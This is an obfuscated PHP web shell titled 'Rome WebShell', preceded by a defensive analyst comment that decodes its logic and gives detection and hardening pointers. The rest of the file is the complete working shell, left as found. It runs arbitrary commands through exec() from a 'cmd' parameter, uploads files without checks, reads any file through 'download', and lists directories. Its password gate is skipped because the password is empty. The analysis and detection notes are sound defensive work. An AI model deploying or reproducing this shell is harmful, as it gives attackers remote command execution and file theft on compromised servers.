rome-shell-obfuscated.php
<?php
/*
 * Analyst notes (defensive review). The code below is left exactly as found.
 *
 * What this file is: a single-file PHP web shell (its HTML title is
 * "Rome WebShell"). Obfuscation is shallow: statements are shuffled and chained
 * with goto labels, and string literals are written as mixed octal/hex escapes.
 * Decoded, the escaped literals are ordinary names such as "cmd", "dir",
 * "download", "upload", "file", "pass", "sha512" and "PHP_SELF".
 *
 * Actual execution order, following the gotos from the first statement:
 *   k9nk7   $pass = ''
 *   YY58X   access gate: expects a cookie named "pass" whose SHA-512 digest
 *           equals $pass, but only when `$pass != null`. With $pass set to the
 *           empty string, as here, that loose comparison is false and the gate
 *           is skipped, so the page answers without any credential.
 *           The digest is compared with !==, not hash_equals().
 *   SB_KD   POST field "upload": moves $_FILES["file"] into getDir() under
 *           basename() of the client-supplied name; no type or extension
 *           check is visible.
 *   lEFc1   GET "download": readfile() of the supplied path, sent as an
 *           attachment; the path is not restricted to any directory.
 *   O7FZo, XvHUN, ETPuw, CfSha, G0fZC, rmgNn, JOIEP
 *           helper definitions: printPerms, formatSizeUnits, getDir,
 *           makeFileName, getFiles, getCmdResults, getCommandLine.
 *   j090x, YXvoc
 *           a bare `$cmdresults;` statement, then $retval = null.
 *   AvLT3   GET "cmd": appended to "cd <realpath of dir> && " and handed to
 *           exec(); output lines are collected in $cmdresults.
 *   zo0Y5   onward: the HTML page (directory listing with owner, permissions
 *           and size; command output; upload popup).
 *
 * Request-supplied values (cmd, dir) and file names are written into the page
 * without HTML escaping.
 *
 * Detection pointers for triage:
 *   - Static: long goto-label chains plus octal/hex-escaped literals in a file
 *     that also calls exec(), move_uploaded_file(), readfile(), scandir() and
 *     posix_getpwuid().
 *   - Web logs: requests to one PHP file carrying cmd=, dir= or download=
 *     query parameters, or a multipart POST with an "upload" field; a cookie
 *     named "pass".
 *   - Hardening that blunts it: exec listed in php.ini disable_functions, and
 *     web-writable directories that the server will not execute PHP from.
 */
goto k9nk7; RZxHM: echo getCommandLine(); goto nXIEc; G0fZC: function getFiles() { $files = scandir(getDir()); $even = true; if ($files != null) { foreach ($files as $filename) { echo "\x3c\x74\x72\40\163\x74\x79\x6c\x65\75\x22\x62\141\143\x6b\147\162\x6f\x75\156\144\x2d\x63\x6f\x6c\157\162\72" . ($even ? "\x23\x35\x31\x35\61\x35\x31" : "\x23\64\x31\64\61\x34\61") . "\x3b\x22\x3e"; echo "\x3c\x74\144\40\x73\164\x79\154\x65\x3d\42\x66\x6f\x6e\164\x2d\167\145\x69\x67\150\x74\72" . (is_dir(getDir() . "\x2f" . $filename) ? "\x62\x6f\154\144" : "\x74\x68\151\x6e") . "\x3b\x22\x3e" . makeFileName($filename) . "\74\57\x74\x64\76"; echo "\74\164\x64\76" . posix_getpwuid(fileowner(getDir() . "\57" . $filename))["\x6e\141\155\x65"] . "\x3c\57\x74\x64\x3e"; echo "\74\164\144\76" . printPerms(getDir() . "\x2f" . $filename) . "\74\57\x74\144\76"; echo "\74\x74\144\x3e" . formatSizeUnits(filesize(getDir() . "\57" . $filename)) . "\x3c\x2f\164\144\76"; echo "\x3c\57\164\x72\x3e"; $even = !$even; } } else { echo "\x3c\x70\x3e\x43\x6f\165\154\144\156\x27\x74\x20\157\x70\145\x6e\40\164\x68\141\x74\40\x64\x69\x72\145\x63\164\157\162\171\x20\x21"; } } goto rmgNn; JOIEP: function getCommandLine() { $hostname = gethostname() ?? "\x6e\x6f\156\x65"; $username = posix_getpwuid(posix_geteuid())["\x6e\141\x6d\145"]; $dir = getDir(); $cmd = isset($_GET["\143\x6d\x64"]) ? $_GET["\143\155\144"] : "\116\157\x20\143\x6f\155\x6d\141\156\144"; return "\x3c\163\x70\141\156\40\163\164\x79\x6c\145\75\x22\x63\x6f\x6c\x6f\x72\72\40\43\61\71\143\x34\x32\x61\x22\x3e" . $username . "\x40" . $hostname . "\74\57\163\160\141\x6e\76\72\40\74\x73\160\x61\x6e\x20\x73\x74\171\x6c\145\75\x22\x63\x6f\154\x6f\x72\x3a\x20\x23\60\146\67\x35\62\61\42\76" . $dir . "\74\57\x73\x70\x61\156\76\x24\x20" . 
$cmd; } goto j090x; YY58X: if ($pass != null) { if (isset($_COOKIE["\x70\x61\x73\163"])) { if (hash("\x73\x68\141\x35\61\x32", $_COOKIE["\160\141\163\163"]) !== $pass) { echo "\x57\162\x6f\x6e\147\x20\x70\141\163\163\x77\x6f\162\x64\x20\41"; die; } } else { echo "\127\162\x6f\x6e\147\x20\160\x61\163\163\167\x6f\x72\144\40\x21"; die; } } goto SB_KD; QIWmY: ?>
"id="command-input"><input name="cmd"> <input name="dir"type="hidden"value="<?php goto tJdhK; AvLT3: if (isset($_GET["\x63\x6d\x64"])) { exec("\143\144\x20" . realpath(getDir()) . "\40\46\46\x20" . $_GET["\x63\155\144"], $cmdresults, $retval); } goto zo0Y5; tJdhK: echo getDir(); goto M2p5s; CfSha: function makeFileName($file) { if (is_dir(getDir() . "\57" . $file)) { return "\x3c\x61\40\150\162\x65\x66\x3d\42" . $_SERVER["\x50\x48\120\x5f\x53\105\114\106"] . "\x3f\144\x69\x72\75" . realpath(getDir() . "\x2f" . $file) . "\x22\x3e" . $file . "\x3c\x2f\141\x3e"; } else { return "\74\x61\x20\x68\x72\x65\x66\75\x22" . $_SERVER["\x50\x48\120\x5f\x53\105\114\106"] . "\x3f\144\x6f\167\x6e\154\x6f\141\x64\75" . realpath(getDir() . "\57" . $file) . "\42\x3e" . $file . "\x3c\x2f\141\x3e"; } } goto G0fZC; ETPuw: function getDir() { return isset($_GET["\x64\151\162"]) ? realpath($_GET["\x64\151\162"]) : getcwd(); } goto CfSha; iXKoB: echo $_SERVER["\x50\x48\x50\x5f\x53\105\114\106"]; goto QIWmY; gb6vP: echo $_SERVER["\120\110\120\137\x53\105\x4c\106"] . "\77\x64\x69\162\x3d"; goto uF9j8; zo0Y5: ?>
<!doctypehtml><html><head><meta charset="utf-8"><title>Rome WebShell</title><script>function changeDir() {
const url = '<?php goto gb6vP; uF9j8: ?>';
const path = window.prompt("Enter the path you want to naviguate to (Eg: '/home/user'): ");
if (path) window.location = (url + path);
}</script><script>const popupHTML = `
<div class="popup-container" id="upload-popup">
<div class="popup">
<h4>Choose a file to upload</h4>
<form action="<?php goto AOeE_; oF70B: ?>
" method="POST" enctype="multipart/form-data">
<input type="file" name='file' id='file' required>
<div class="popup-buttons">
<button type="button" onclick="hidePopup()">Cancel</button>
<input type="submit" value="Upload" name="upload">
</div>
</form>
</div>
</div>
`;
function showPopup() {
const body = document.getElementsByTagName('body')[0];
const bodyHTML = body.innerHTML;
body.innerHTML = popupHTML + bodyHTML;
}
function hidePopup() {
const body = document.getElementsByTagName('body')[0];
body.removeChild(body.getElementsByClassName('popup-container')[0]);
}</script></head><body class="body-container"><header><nav><h1>> Rome Shell</h1><div class="nav-items"><a onclick="showPopup()">Upload file</a> <a onclick="changeDir()">Change Directory</a></div></nav></header><div class="content-container"><div class="explorer-panel"><h4>Exploring:<?php goto PCg56; Qvb2t: ?>
</p></div><form action="<?php goto iXKoB; sehAW: ?>
</h4><table><tr style="background-color:#292929"><th>Folder / <span style="font-weight:lighter">File</span></th><th>Owner</th><th>Permissions</th><th>Size</th></tr><?php goto ovPbP; j090x: $cmdresults; goto YXvoc; k9nk7: $pass = ''; goto YY58X; YXvoc: $retval = null; goto AvLT3; CmY23: ?>
</table></div><div class="command-panel"><div class="command-output"><p><?php goto RZxHM; XvHUN: function formatSizeUnits($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . "\x20\107\x42"; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . "\40\x4d\x42"; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . "\40\113\x42"; } elseif ($bytes > 1) { $bytes = $bytes . "\x20\x62\x79\164\x65\x73"; } elseif ($bytes == 1) { $bytes = $bytes . "\x20\x62\x79\x74\x65"; } else { $bytes = "\60\40\142\x79\164\x65\x73"; } return $bytes; } goto ETPuw; lEFc1: if (isset($_GET["\x64\x6f\x77\156\x6c\157\x61\x64"])) { $file = $_GET["\x64\157\167\156\x6c\x6f\141\x64"]; if (file_exists($file)) { if (is_readable($file)) { header("\103\x6f\156\164\x65\x6e\x74\55\104\x65\163\x63\162\151\160\x74\x69\157\156\x3a\x20\x46\151\154\145\40\124\162\141\156\163\x66\x65\x72"); header("\x43\157\x6e\164\x65\156\x74\x2d\x54\x79\x70\145\x3a\x20\x61\160\x70\154\x69\143\141\164\x69\x6f\156\x2f\157\x63\x74\145\x74\x2d\163\x74\x72\x65\141\155"); header("\x43\x6f\156\164\x65\156\x74\x2d\104\x69\163\160\x6f\163\x69\x74\151\x6f\156\x3a\40\x61\x74\164\141\143\150\x6d\145\x6e\164\73\x20\146\x69\x6c\145\156\141\155\145\x3d\42" . basename($file) . "\42"); header("\x45\170\x70\x69\162\x65\x73\72\40\60"); header("\103\141\x63\x68\x65\55\x43\157\x6e\164\x72\157\x6c\72\40\155\x75\x73\164\55\162\145\x76\141\x6c\x69\x64\141\164\145"); header("\x50\x72\x61\147\x6d\141\72\x20\x70\x75\142\154\151\143"); header("\103\157\x6e\164\x65\156\164\x2d\x4c\145\156\x67\164\150\72\x20" . 
filesize($file)); readfile($file); die; } else { echo "\x3c\x73\143\x72\x69\x70\x74\x3e\x61\154\x65\x72\164\x28\47\105\x72\x72\x6f\x72\x3a\40\x43\157\165\x6c\x64\x20\156\x6f\164\x20\162\145\x61\144\x20\x74\150\x65\x20\x66\x69\154\145\x20\41\x27\51\74\57\163\x63\x72\151\x70\x74\x3e"; die; } } } goto O7FZo; ovPbP: getFiles(); goto CmY23; WOLEX: getCmdResults(); goto Qvb2t; SB_KD: if (isset($_POST["\165\x70\154\157\x61\144"])) { $desinationDir = getDir(); $destinationFile = $desinationDir . "\x2f" . basename($_FILES["\146\151\x6c\x65"]["\x6e\x61\155\145"]); if (file_exists($destinationFile)) { echo "\x3c\x73\x63\x72\x69\160\x74\x3e\141\154\x65\162\164\x28\x27\x45\162\162\157\x72\72\x20\x46\151\154\x65\40\141\154\x72\x65\x61\x64\171\x20\x65\170\151\x73\164\x73\40\x21\x27\x29\x3c\57\x73\x63\162\151\160\164\76"; } else { if (move_uploaded_file($_FILES["\x66\151\x6c\x65"]["\x74\155\160\137\156\141\x6d\x65"], $destinationFile)) { echo "\74\x73\143\x72\151\x70\x74\76\x61\154\x65\162\x74\x28\47\x46\x69\x6c\145\x20\x75\160\x6c\157\x61\x64\x65\x64\40\163\165\143\143\x65\x73\x73\x66\165\x6c\x79\x20\x21\x27\x29\74\57\163\143\x72\x69\x70\x74\76"; } else { echo "\x3c\163\143\x72\x69\x70\164\76\141\x6c\145\162\x74\50\47\105\162\x72\157\162\72\x20\103\157\x75\x6c\144\x20\156\157\x74\40\x75\x70\154\x6f\141\x64\x20\146\151\x6c\x65\40\41\x27\51\x3c\57\x73\x63\162\151\160\164\76"; } } } goto lEFc1; AOeE_: echo $_SERVER["\x50\110\120\x5f\x53\x45\x4c\106"] . "\77\144\151\162\75" . getDir(); goto oF70B; O7FZo: function printPerms($file) { $mode = fileperms($file); if ($mode & 4096) { $type = "\160"; } else { if ($mode & 8192) { $type = "\143"; } else { if ($mode & 16384) { $type = "\x64"; } else { if ($mode & 24576) { $type = "\142"; } else { if ($mode & 32768) { $type = "\x2d"; } else { if ($mode & 40960) { $type = "\x6c"; } else { if ($mode & 49152) { $type = "\163"; } else { $type = "\x75"; } } } } } } } $owner["\x72\145\141\144"] = $mode & 256 ? 
"\162" : "\55"; $owner["\167\162\x69\x74\145"] = $mode & 128 ? "\167" : "\55"; $owner["\145\170\x65\143\x75\x74\x65"] = $mode & 64 ? "\x78" : "\55"; $group["\x72\x65\x61\144"] = $mode & 32 ? "\162" : "\55"; $group["\x77\162\x69\164\145"] = $mode & 16 ? "\x77" : "\x2d"; $group["\145\170\145\143\x75\x74\145"] = $mode & 8 ? "\x78" : "\x2d"; $world["\x72\x65\x61\x64"] = $mode & 4 ? "\x72" : "\x2d"; $world["\x77\162\151\164\x65"] = $mode & 2 ? "\167" : "\x2d"; $world["\x65\x78\x65\x63\x75\x74\x65"] = $mode & 1 ? "\x78" : "\x2d"; if ($mode & 2048) { $owner["\145\x78\x65\x63\x75\x74\x65"] = $owner["\x65\170\x65\x63\165\164\x65"] == "\170" ? "\x73" : "\123"; } if ($mode & 1024) { $group["\145\x78\145\143\x75\x74\145"] = $group["\x65\x78\x65\x63\165\x74\x65"] == "\170" ? "\163" : "\x53"; } if ($mode & 512) { $world["\x65\x78\x65\143\x75\164\145"] = $world["\145\x78\x65\x63\165\x74\145"] == "\170" ? "\164" : "\x54"; } $s = sprintf("\x25\x31\163", $type); $s .= sprintf("\45\61\x73\45\61\x73\x25\x31\163", $owner["\x72\145\x61\144"], $owner["\167\162\151\x74\x65"], $owner["\145\x78\x65\x63\x75\x74\x65"]); $s .= sprintf("\45\61\163\45\61\x73\x25\x31\163", $group["\162\x65\x61\144"], $group["\167\x72\151\x74\x65"], $group["\145\x78\145\x63\165\x74\x65"]); $s .= sprintf("\x25\61\163\x25\61\x73\45\x31\x73", $world["\x72\145\x61\x64"], $world["\167\162\151\x74\145"], $world["\145\x78\145\x63\x75\164\x65"]); return $s; } goto XvHUN; rmgNn: function getCmdResults() { global $cmdresults; global $retval; if ($retval == 0) { foreach ($cmdresults as $line) { echo "{$line}\40\xa\x3c\142\x72\76"; } } else { echo "\105\170\x65\143\x75\x74\151\157\156\x20\x66\x61\151\154\145\144\x20\167\151\x74\x68\x20\x65\162\x72\157\162\40\143\x6f\144\x65\72\x20" . $retval; } } goto JOIEP; nXIEc: ?>
</p><p><?php goto WOLEX; PCg56: echo getDir(); goto sehAW; M2p5s: ?>
"> <button action="submit"><p>Send</p></button></form></div></div><style>:root{--background-color-1:#101010;--background-color-2:#202020;--background-color-3:#303030;--background-color-4:#404040;--primary-color:#0e9c15;--secondary-color:#0f7521}body,html{width:100%;height:100%;margin:0;padding:0;background-color:var(--background-color-2)}.body-container{display:grid;grid-template-rows:50px calc(100% - 50px)}header{z-index:1;background-color:var(--primary-color);box-shadow:0 2px 6px #000}header nav{height:100%;display:flex;justify-content:flex-start;color:#fff;font-family:Arial,Helvetica,sans-serif}header h1{height:100%;margin:0;margin-left:20px;text-align:center;line-height:50px;font-size:40px}header .nav-items{height:100%;width:auto;margin:0;display:flex;flex-grow:1;justify-content:flex-end}header .nav-items a{height:100%;margin-right:30px;color:#fff;font-size:25px;text-decoration:none;line-height:50px;text-align:center;transition:ease-in .2s}header .nav-items a:hover{color:#d0d0d0;cursor:pointer}.content-container{height:100%;position:relative;display:grid;grid-template-columns:30% 70%}.explorer-panel{background-color:var(--background-color-3);font-family:'Trebuchet MS','Lucida Sans Unicode','Lucida Grande','Lucida Sans',Arial,sans-serif;overflow-y:scroll;scrollbar-color:var(--background-color-4) var(--background-color-3);scrollbar-width:thin;box-shadow:0 0 4px #000;padding:3px}.explorer-panel h4{margin:10px;font-size:20px}.explorer-panel table{width:100%;word-wrap:break-word;border-spacing:2px;table-layout:fixed;background-color:var(--background-color-2)}.explorer-panel table td{padding:1px 2px}.explorer-panel table a{color:var(--primary-color);text-decoration:none}.explorer-panel table a:hover{color:var(--secondary-color);transition:ease .2s}.command-panel{margin:20px;padding:15px;border-radius:5px;background-color:var(--background-color-3);display:grid;grid-template-rows:93% calc(7% - 15px);row-gap:15px;box-shadow:0 0 6px 
#000}.command-output{padding:5px;border-radius:5px;background-color:var(--background-color-1);overflow-y:scroll;scrollbar-color:var(--background-color-4) var(--background-color-3);scrollbar-width:thin}.command-output p{margin:0;font-family:'Gill Sans','Gill Sans MT',Calibri,'Trebuchet MS',sans-serif}#command-input{display:grid;grid-template-columns:89% 10%;grid-template-rows:100%;column-gap:1%}#command-input input{height:100%;width:100%;border-radius:5px;border:none;background-color:var(--background-color-2);color:#fff;font-size:200%}#command-input button{height:100%;width:100%;border:none;border-radius:5px;background-color:var(--background-color-4);cursor:pointer}#command-input button:hover{background-color:var(--primary-color);transition:ease-in-out .3s}#command-input button p{margin:0;color:#fff;font-family:'Segoe UI',Tahoma,Geneva,Verdana,sans-serif;font-size:150%;font-weight:bolder;line-height:100%}.popup-container{z-index:5;position:fixed;background-color:rgba(10,10,10,.6);width:100%;height:100%;display:grid;justify-content:center;align-content:center;grid-template-columns:30%;grid-template-rows:35%}.popup{background-color:var(--background-color-3);border-radius:5px;box-shadow:0 2px 6px #000;display:grid;grid-template-rows:20% 70%;row-gap:10%;padding:2.5%}.popup h4{text-align:center;font-family:'Courier New',Courier,monospace;font-size:23px}.popup form{display:grid;grid-template-rows:80% 20%;grid-template-columns:95%;justify-content:center;align-content:center}.popup-buttons{height:100%;display:inline-flex;flex-wrap:wrap;gap:10%}.popup-buttons button{width:45%;background-color:var(--background-color-4);border-radius:4px;border:none;font-size:22px;color:#fff;transition:ease-in .2s}.popup-buttons button:hover{background-color:var(--background-color-2);cursor:pointer}.popup-buttons input{width:45%;background-color:var(--primary-color);border-radius:4px;border:none;font-size:22px;color:#fff;transition:ease-in .2s}.popup-buttons 
input:hover{background-color:var(--secondary-color);cursor:pointer}</style></body></html>